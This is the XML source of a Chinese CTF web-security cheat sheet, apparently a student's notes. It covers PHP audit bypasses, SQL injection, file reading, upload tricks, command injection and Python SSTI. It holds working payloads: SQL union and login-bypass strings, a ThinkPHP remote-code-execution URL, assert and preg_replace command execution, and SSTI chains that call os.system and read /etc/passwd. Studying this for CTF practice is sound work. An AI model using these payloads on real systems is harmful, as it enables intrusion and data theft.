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bookmarkStart w:id="0" w:name="_Toc40"/>
      <w:bookmarkStart w:id="1" w:name="_Toc15172"/>
      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1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WEB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc15149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一.Web后门</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18789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1.D盾</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20515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二.PHP代码审计</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22957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三.SQL注入</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc3568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1.单输入框注入</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16370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2.报错注入</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14650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四.文件读取</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27751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五.文件上传</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20227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六.Linux指令</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26422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七.XFF绕过</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc307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八.SSTI(Python)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25453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九.HTTP请求伪造</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25695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十.一些杂七杂八的打法</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc540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15149"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/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3" w:name="_Toc18789"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web后门</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="13"/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常见的几种解决工具：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4" w:name="_Toc20515"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>D盾</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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先点击查杀，选择Web目录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3515" cy="2515870"/>
            <wp:effectExtent l="0" t="0" r="1333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选择后程序自动扫描，得到文件级别高的一般含有信息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1043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21043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bookmarkStart w:id="5" w:name="_Toc22957"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二.PHP代码审计</w:t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mb_strpos($page . '?', '?')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找到 $page 变量中第一个问号的索引位置，如果找不到问号则返回 false。注意，$page . '?' 的目的是确保在 $page 变量末尾加上一个问号，这是为了确保 $page 变量中不含问号时仍能正确获得索引位置。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mb_substr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>( $page,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0,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mb_strpos($page . '?', '?'))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使用 mb_substr 函数截取了 $page 变量中从索引位置 0 开始，一直到第一个问号之前的子字符串。mb_substr 函数返回截取后的子字符串，并将其赋值给 $_page 变量。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数字与字符串比较时，字符串会默认截取字符前的数字值进行比较，例如"123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"会变成123，所以数字项为123即相等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Intval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(key)，将参数key转换为数字类型，如果是字符串会默认截取字符前的数字值，例如key为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则输出123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print_r(scandir(chr(47)))：转换/对应的ASCII码值为/字符，之后读取根目录，再将内容显示出来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__wakeup()：PHP对象实例化会优先调用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__destruct()：PHP对象实例化最后销毁时调用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大数长度限制绕过：采用科学计数法1e9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md5($a)==md5($b)函数绕过&amp;md5($a)==sha1($b)函数绕过：==为弱类型比较，数组绕过，写a[]=111&amp;b[]=222，md5计算出来为null==null，通过条件，注意a[]得知不能等于b[]的值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strlower()函数绕过：转小写函数，但是遇到unicode格式字符串会转为大写，输入unicode格式字符串例如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ᴬᴰᴹᴵᴺ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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[OC]：匹配字符串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::：匹配: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\dt：匹配数字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/:：不区分大小写匹配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O:1:可以改为O:+1实现序列化绕过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file_get_contents(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$text,'r')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>===函数绕过：data伪协议(===后的字符串内容用base64加密)：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?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=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如果不存在$text对应的文件，使用?参数名[]=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正则表达式可以使用数组类型参数绕过，例如flag[]=/flag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PHP8之前[会被解析成_，例如代码中$_POST(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e_v.a.l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)参数名要写e[v.a.l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ctype_alnum($text)函数：匹配传入参数中是否全为数字或者字母，如果是返回true，否则返回false。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preg_replace($pattern, $replacement, $subject)函数：将subject中匹配pattern的部分用replacement替换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如果启用/e参数的话，就会将replacement当做php代码执行。造成命令执行漏洞，例如：preg_replace('/abc/e', 'system("ls")', asdsadasabc')，注意replacement部分可能需要url编码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assert()函数:检查断言是否为 false，且会将括号中的字符当成代码来执行，返回true或false，并在结果为 false 时采取适当的行动。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利用方式：通过增加or的方式保证assert通过且执行漏洞代码，例如传入assert参数为?page=123') or system("cat templates/flag.php");，这里or左侧的要满足assert判断条件(根据实际需求修改)，右侧为攻击代码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bookmarkStart w:id="6" w:name="_Toc3568"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三.SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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16370"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.单输入框注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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查询数据库：1;show databases;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查询数据表：1;show tables;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查询结果(例如查询语句为select *,1||flag from Flag)：*,1或者1;set sql_mode=PIPES_AS_CONCAT;select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登录绕过：admin'or '1'='1'#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4650"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.报错注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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查询字段数(3个):?username=admin' order by 3%23&amp;password=1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3040" cy="1913890"/>
            <wp:effectExtent l="0" t="0" r="1016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00650" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="635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测试回显点位(判断页面1、2、3回显哪些)：?username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=1' union select 1,2,3%23&amp;password=1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898900" cy="2736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查询数据库名及版本：?username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=1' union select 1,database(),version()%23&amp;password=1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查询数据库表：?username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&amp;password=1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查询数据库表字段：?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'%23&amp;password=1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查询数据库表字段值集合：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?username=1' union select 1,2,group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字段名1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字段名2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字段名3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">) from 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%23&amp;password=1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bookmarkStart w:id="9" w:name="_Toc27751"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四.文件读取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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代码无直接读取时查询文件内容：参数名=php://filter/convert.base64-encode/resource=文件名。得到的内容放到cyberchef中base64解码即可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参数只能传数字绕过：参数前面加一个空格，类似? num=a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符号绕过：利用chr()函数，将符号转为chr(10进制值)即可，注意多个字符对应chr()要用.连接，例如file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))即file_get_contents(/flagg)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ThinkPHP漏洞：读取根目录文件传入：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?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]= ls 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读取文件传入：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?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=cat  /flag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bookmarkStart w:id="10" w:name="_Toc20227"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>五.文件上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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在AWD文档中，记载了很多相关绕过方式，下面只记录新的绕过规则打法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&lt;?绕过一句话木马(蚁剑连接密码为shell)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alt="" type="#_x0000_t75" style="height:31.8pt;width:32.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9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Nginx中.htaccess绕过，之后上传文件后缀名改为.mochu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31.8pt;width:37.1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1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蚁剑连接如果flag文件显示为空，右键文件保存到本地用sublime打开即可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bookmarkStart w:id="11" w:name="_Toc26422"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>六.Linux指令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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PING指令：能够PING通的IP地址&amp;&amp;控制台指令(左边为真则右边执行)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命令绕过：ls-&gt;l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字符绕过：字符变为八进制(/-&gt;\57)，或者16进制(/-&gt;\x2E)，或者16进制unicode(/-&gt;\u(unicode值))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空格绕过： -&gt;${IFS}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bookmarkStart w:id="12" w:name="_Toc307"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>七.XFF绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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BP拦截后修改X-Forwarded-for为目标IP地址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必要时修改Referer为目标url绕过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bookmarkStart w:id="13" w:name="_Toc25453"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>八.SSTI(Python)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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在AWD文档中，记载了一部分写法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判断有无SSTI注入：{{10+20}}，如果页面显示出30则存在SSTI注入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__class__：返回类型所属对象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__mro__：返回一个包含对象所继承的基类元组，方法再解析时按照元组顺序解析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__subclasses__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每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表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__init__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类的初始化方法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__globals__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对包含函数全局变量的字典的引用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__builtins__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builtins就是引用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在python 里 [] 表示空列表，()表示空元组，{}表示空字典 对字典、列表、元祖的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取值均使用变量名 x[index or key] 的形式。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获取基类的几种方法：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[].__class__.__base__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''.__class__.__mro__[2]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().__class__.__base__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{}.__class__.__base__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request.__class__.__mro__[8] 　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[].__class__.__bases__[0]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获取基本类的子类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[].__class__.__base__.__subclasses__()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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标一般为2，file类对应下标一般为40，Printer类对应下标一般为71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查找Object类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{{''.__class__.__mro__[?]}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">，这里的?从1开始试，直到返回为&lt;type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object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寻找可用引用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{{''.__class__.__mro__[Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__subclasses__()}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，对应类型前有多少个，，就是对应的下标值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查看当前目录结构：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{{''.__class__.__mro__[Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__subclasses__()[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Printer类对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__init__.__globals__['os'].listdir('.')}}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读取文件：{{''.__class__.__mro__[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标].__subclasses__()[file类对应下标]('文件名').read()}}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三个常用payload：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''.__class__.__mro__[Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__subclasses__()[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Printer类对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__init__.__globals__['os'].popen('catfl4g').read()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''.__class__.__mro__[Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__subclasses__()[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Printer类对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__init__.__globals__['os'].system('ls')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''.__class__.__mro__[Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>].__subclasses__()[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file类对应下标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]('/etc/passwd').read()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bookmarkStart w:id="14" w:name="_Toc25695"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>九.HTTP请求伪造</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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设置本地访问，在BP拦截请求加上X-Real-IP:127.0.0.1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本地IP设置：在BP中加上：X-Forwarded-For:127.0.0.1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bookmarkStart w:id="15" w:name="_Toc540"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十.一些杂七杂八的打法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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注意相应中可能含有提示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2490470"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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cookie寻找注入点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kMzRiN2IzZTljMzI3ZmQxZjdhMGI0ZGYyMTQ4MzAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="008101A9"/>
    <w:rsid w:val="07544AAE"/>
    <w:rsid w:val="098B203F"/>
    <w:rsid w:val="09F16623"/>
    <w:rsid w:val="0C3D590B"/>
    <w:rsid w:val="0C4E2D33"/>
    <w:rsid w:val="0D9D73D8"/>
    <w:rsid w:val="0EB8030B"/>
    <w:rsid w:val="188B0AE2"/>
    <w:rsid w:val="1A1E433C"/>
    <w:rsid w:val="1D26626B"/>
    <w:rsid w:val="20145C0D"/>
    <w:rsid w:val="21C71488"/>
    <w:rsid w:val="23F47432"/>
    <w:rsid w:val="24ED2F79"/>
    <w:rsid w:val="293F5045"/>
    <w:rsid w:val="29E46B7A"/>
    <w:rsid w:val="309B5F37"/>
    <w:rsid w:val="33563502"/>
    <w:rsid w:val="342E0456"/>
    <w:rsid w:val="35032FAA"/>
    <w:rsid w:val="36F319EE"/>
    <w:rsid w:val="37CA3B50"/>
    <w:rsid w:val="3B304812"/>
    <w:rsid w:val="3B505D8C"/>
    <w:rsid w:val="422145A5"/>
    <w:rsid w:val="46F50AA4"/>
    <w:rsid w:val="47242D51"/>
    <w:rsid w:val="47BE7677"/>
    <w:rsid w:val="4966472C"/>
    <w:rsid w:val="4B644327"/>
    <w:rsid w:val="51A33E25"/>
    <w:rsid w:val="54E01F28"/>
    <w:rsid w:val="55326BBC"/>
    <w:rsid w:val="566E63B1"/>
    <w:rsid w:val="569021B1"/>
    <w:rsid w:val="58A261CC"/>
    <w:rsid w:val="59727DC8"/>
    <w:rsid w:val="59967ADE"/>
    <w:rsid w:val="5B9657A3"/>
    <w:rsid w:val="5C465FD5"/>
    <w:rsid w:val="5CE507C4"/>
    <w:rsid w:val="5E8E46F2"/>
    <w:rsid w:val="62963FAA"/>
    <w:rsid w:val="63F024E1"/>
    <w:rsid w:val="641C4874"/>
    <w:rsid w:val="64C34F1F"/>
    <w:rsid w:val="65561CE7"/>
    <w:rsid w:val="6A5B2D93"/>
    <w:rsid w:val="6A69679B"/>
    <w:rsid w:val="6CCA70DE"/>
    <w:rsid w:val="6F6064C7"/>
    <w:rsid w:val="6FCD3564"/>
    <w:rsid w:val="70963105"/>
    <w:rsid w:val="78244B08"/>
    <w:rsid w:val="7E50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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin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宋佳兴</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-02T10:16:49Z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07FA03BE68584998AE6E1A7F57637B1E_12</vt:lpwstr>
  </property>
</Properties>
</file>